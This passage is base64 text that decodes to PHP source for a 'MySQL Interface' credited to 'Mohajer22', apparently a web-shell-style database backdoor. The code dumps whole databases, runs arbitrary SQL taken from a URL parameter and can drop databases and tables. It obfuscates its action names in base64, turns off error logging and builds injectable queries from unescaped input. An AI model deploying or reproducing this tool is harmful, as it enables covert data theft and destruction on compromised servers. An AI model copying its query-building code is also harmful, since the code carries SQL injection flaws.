iI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNv